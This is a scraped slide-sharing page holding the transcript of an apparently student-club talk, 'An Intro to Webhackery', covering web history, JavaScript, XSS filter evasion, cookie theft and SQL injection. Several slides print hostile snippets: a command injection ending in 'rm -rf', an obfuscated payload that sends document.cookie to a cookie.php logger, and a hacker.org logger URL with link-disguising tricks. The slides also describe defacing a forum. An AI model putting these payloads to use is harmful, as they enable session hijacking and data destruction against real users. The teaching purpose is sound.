Presentation is loading. Please wait.

Presentation is loading. Please wait.

An Intro to Webhackery Parisa Tabriz. How the web was born Stage 1 : Network Protocols Stage 2 : HTTP Stage 3 : Server Side Scripting Stage 4 : Client.

Published byPaulina McKinney Modified over 9 years ago

Similar presentations

Presentation on theme: "An Intro to Webhackery Parisa Tabriz. How the web was born Stage 1 : Network Protocols Stage 2 : HTTP Stage 3 : Server Side Scripting Stage 4 : Client."— Presentation transcript:

1 An Intro to Webhackery Parisa Tabriz

2 How the web was born Stage 1 : Network Protocols Stage 2 : HTTP Stage 3 : Server Side Scripting Stage 4 : Client Side Scripting

3 Stage 1 : Network Protocols Late 1970’s, Internet is a collection of TCP/IP networks by scientists and researchers. Main services include email, finger, ftp, telnet Services sit on top of existing protocols so people don’t have to know how protocols work

4 Stage 1 : Security Risks Application Specific – Email could be forged Protocol Specific – Steve Belevin pointed out flaws in TCP/IP Design of the Internet – Homogeneous environment is greatest strength and weakness.

5 Stage 2 : HTTP HTTP protocol, HTML format Early 1990’s, Mosaic browser introduced Netscape Navigator introduces helper applications (postscript/image viewers, audio/video players)

6 Stage 2 : Security Threat Many applications are running the same software on the same protocol

7 Stage 3 : Server Scripting CGI Scripts – Allow users to create dynamic content. Magazines start using the web as a media outlet, large companies have web pages, search engines developed

8 Stage 3 : Security Threats Increased threat to web servers as many CGI scripts run with full privileges. User input is piped to command interpreter cat filename | mail user@address cat filename | mail user@address | rm –rf

9 Stage 4 : Client Scripting Reduces load on server (more parallelism) Java, Javascript, ActiveX Ed Felton/Princeton broke the Java bytecode verifier to enable arbitrary native code to run on the machine David Hopwood/Oxford found ways to create hostile applets.

10 Stage 4 : Security Threats Code is downloaded and run on host machine.

11 What is web security? Secure the web server! Secure the channel between server and client! Secure the client, machine running the client, and any other application on the machines that can access the Internet!

12 Javascript First, it’s NOT Java! Javascript was developed by Netscape to allow code to be contained in HTML and dynamically change the HTML the browser interprets based on conditions. Most Useful Features - User-specified event handlers (ie. mouse handlers, keystroke entries) Attacks - Most take user intervention, but creativity can get users to click on anything. People love to click! History tracking, retrieving and reading directory listings to learn about target file systems, stealing files,

13 Javascript Syntax var [varname] = [value]; http://p.fscked.org/trickortreat/JS1.php

14 Javascript References Beginner-Medium Javascript Tutorial: –http://hotwired.lycos.com/webmonkey/programming/javascript/tut orials/tutorial1.htmlhttp://hotwired.lycos.com/webmonkey/programming/javascript/tut orials/tutorial1.html Javascript Event Handlers: –http://www.webdevelopersjournal.com/articles/jsevents2/jsevents 2.htmlhttp://www.webdevelopersjournal.com/articles/jsevents2/jsevents 2.html Advanced Javascript: –http://hotwired.lycos.com/webmonkey/programming/javascript/tut orials/tutorial2.htmlhttp://hotwired.lycos.com/webmonkey/programming/javascript/tut orials/tutorial2.html –http://javascriptkit.com/javatutors/index.shtmlhttp://javascriptkit.com/javatutors/index.shtml

15 Ad Squashing Most free sites will put horrible, blinding banners and ads on their free service sites. Ads hurt me. Sites will use some HTML tag to identify where in your page they should insert their ads and banners. General tactic is we find which tag is uses as a place marker, if it inserts before or after this tag, and how we can hide the banners.

16 Ad Squashing Tactics method // decoy // real tag,, method –The banner HTML added by the site will not render according to the tags you use, so most browsers will ignore it. Print out the tag '); //-->

17 Ad Squashing Tactics AngelfireAngelfire- Home to some of the ugliest and most ad- infested sites on the Internet. My Homepage My Homepage (fixed)My Homepage

18 Filtering Avoidance So let’s say we want to spread the good name of SigMIL to the Internet. To get our name out there, we get a brilliant idea to add this to blog and guestbook comments… document.location=http://www.acm.uiuc.edu/sigmil/;http://www.acm.uiuc.edu/sigmil/

19 Filtering Avoidance Unfortunately, there is usually some type of filtering going on the server to prevent people from submitting tags. Get around this by using Hex values for characters document.location=http://www.acm.uiuc.edu/sigmil/;http://www.acm.uiuc.edu/sigmil/

20 Filtering Avoidance Getting past Javascript filters can be very powerful… –Spoofed email addresses –Stealing cookies –Causing redirection Do testing to find out what tags and characters are being filtered (' " ; | / and % ) Anywhere there is input that is displayed on a page which other people may visit, there is an opportunity to steal information.

21 Stealing Cookies Disclaimer: If you need to login to a site, and the site encrypts your cookies, there probably isn’t much you will accomplish from stealing cookies.

22 Stealing Cookies Is user input filtered for any characters? Example for filtering of ‘ or “ var u = String.fromCharCode(0x0068); u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0070); u %2B= String.fromCharCode(0x003A); u %2B= String.fromCharCode(0x002F); … (url) u %2B= document.cookie; // http://acm.uiuc.edu/sigmil/cookie.php?USERCOOKIE document.location.replace(u);

23 Stealing Cookies Another method is to use image tags that automatically make server requests for you. http://acm.uiuc.edu/sigmil/(document.cookie) Steve used this method to deface a forum, and on thefacebook.com

24 Stealing Cookies Hotmail/Javascript Exploit: http://www.peacefire.org/security/hmattach/ http://www.peacefire.org/security/hmattach/ Remote Cookie Viewer Exploit: http://www.peacefire.org/security/iecookies/

25 Lessons Learned Programmer: N ever print user input back to the user, filter out mischievous characters ( ), and pack all url encoding before filtering input. Attacker: Realize that programmers are lazy, don’t do the above, and take advantage!

26 Only an idiot would click! No one is going to click on your link if it looks like this: http://site.com/vulnscript.php?document.location.relace('http://hacker.org/log ger.php?' + document.cookie); Obscure the URL –onmouseover –Convert IP addresses to decimal values –.htaccess trickery Normal form: http://username@hacker.org Obscured form: http://microsoft.com/site/dir/helpdesk.asp@hacker.org

27 SQL Injections SQL Injection is a technique which allows us to execute unauthorized SQL commands that build dynamic SQL queries Methodology 1.Escape intended command 2.Execute desired command 3.Comment out remaining query

28 SQL Injections Now for some examples…

Download ppt "An Intro to Webhackery Parisa Tabriz. How the web was born Stage 1 : Network Protocols Stage 2 : HTTP Stage 3 : Server Side Scripting Stage 4 : Client."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?

WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?
Java Script Session1 INTRODUCTION.

Java Script Session1 INTRODUCTION.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
INTERNET DATABASE Chapter 9. u Basics of Internet, Web, HTTP, HTML, URLs. u Advantages and disadvantages of Web as a database platform. u Approaches for.

INTERNET DATABASE Chapter 9. u Basics of Internet, Web, HTTP, HTML, URLs. u Advantages and disadvantages of Web as a database platform. u Approaches for.
INTERNET DATABASE. Internet and E-commerce Internet – a worldwide collection of interconnected computer network Internet – a worldwide collection of interconnected.

INTERNET DATABASE. Internet and E-commerce Internet – a worldwide collection of interconnected computer network Internet – a worldwide collection of interconnected.
Active X Microsoft’s Answer to Dynamic Content Reference: Using Active X by Brian Farrar QUE

Active X Microsoft’s Answer to Dynamic Content Reference: Using Active X by Brian Farrar QUE
Dynamic Web Pages Bert Wachsmuth. Review  Internet, IP addresses, ports, client-server, http, smtp  HTML, XHTML, XML  Style Sheets, external, internal,

Dynamic Web Pages Bert Wachsmuth. Review  Internet, IP addresses, ports, client-server, http, smtp  HTML, XHTML, XML  Style Sheets, external, internal,
Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.

Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.
WWW and Internet The Internet Creation of the Web Languages for document description Active web pages.

WWW and Internet The Internet Creation of the Web Languages for document description Active web pages.
Browser and E-mail Basics Tutorial 1. Learn about Web browser software and Web pages The Web is a collection of files that reside on computers, called.

Browser and Basics Tutorial 1. Learn about Web browser software and Web pages The Web is a collection of files that reside on computers, called.
Mgt 240 Lecture Website Construction: Software and Language Alternatives March 29, 2005.

Mgt 240 Lecture Website Construction: Software and Language Alternatives March 29, 2005.
Chapter 6: Hostile Code Guide to Computer Network Security.

Chapter 6: Hostile Code Guide to Computer Network Security.
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.

 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Web Programming Material From Greenlaw/Hepp, In-line/On-line: Fundamentals of the Internet and the World Wide Web 1 Introduction The JavaScript Programming.

Web Programming Material From Greenlaw/Hepp, In-line/On-line: Fundamentals of the Internet and the World Wide Web 1 Introduction The JavaScript Programming.
INTRODUCTION TO WEB DATABASE PROGRAMMING

INTRODUCTION TO WEB DATABASE PROGRAMMING
Javascript and the Web Whys and Hows of Javascript.

Javascript and the Web Whys and Hows of Javascript.
FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)

FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)
Dynamic Web Pages (Flash, JavaScript)

Dynamic Web Pages (Flash, JavaScript)

Similar presentations

Ads by Google